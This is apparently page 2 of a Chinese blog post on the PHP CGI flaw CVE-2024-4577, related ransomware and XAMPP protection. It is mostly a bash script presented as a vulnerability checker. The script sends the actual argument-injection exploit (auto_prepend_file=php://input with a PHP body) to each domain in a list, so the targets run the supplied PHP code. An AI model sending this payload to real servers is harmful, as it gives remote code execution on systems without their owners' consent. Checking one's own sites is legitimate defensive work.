PHP CGI 远程代码执行漏洞【CVE-2024-4577】勒索攻击，locked后缀加密和READ_ME9.html勒索解密联系方式，XAMPP网站防护方法

PHP CGI 远程代码执行漏洞【CVE-2024-4577】检测bash脚本

直接运行该脚本文件可一个一个检测网站是否存在【CVE-2024-4577】漏洞，运行 脚本.sh <domain_list_file> 可批量检测，<domain_list_file>文件中的域名需要以 \n 作为换行符。

#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
    local domain=$1
    local response=$(curl -s -X POST "${domain}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
        -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" \
        -H "Accept: */*" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Connection: keep-alive" \
        --data "<?php phpinfo(); ?>" \
        --max-time 10)

#    echo $response > "$(pwd)/${domain#*//}.html"

    if [[ $response == *"PHP Version"* ]]; then
        echo "$domain: 存在漏洞"
    else
        echo "$domain: 未检测到漏洞"
    fi
}

# Main function to iterate over domains
main() {
    local file=$1
    while IFS= read -r domain || [ -n "$domain" ]; do
        if [[ ! -z "$domain" ]]; then
            echo "Testing $domain..."
            check_vulnerability "$domain"
        fi
    done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
    echo "INFO: 执行命令 $0 <domain_list_file> 可批量检测域名，<domain_list_file>需以\n作为换行符"

    check_yn="y"
    until [ "${check_yn}" == "n" ] || [ "${check_yn}" == "N" ]; do
        read -p "请输入检测是否存在PHP CGI 参数注入漏洞的域名(http://www.aa.com)：" domain
        check_vulnerability "$domain"
        read -p "INFO: 是否继续检测 [y/n] " check_yn
    done

    read -p "Please enter any key to exit" exit_shell
else
    main "$1"
fi

【参考资料】

转载请注明：半亩方塘 » PHP CGI 远程代码执行漏洞【CVE-2024-4577】勒索攻击，locked后缀加密和READ_ME9.html勒索解密联系方式，XAMPP网站防护方法

上一页 1 2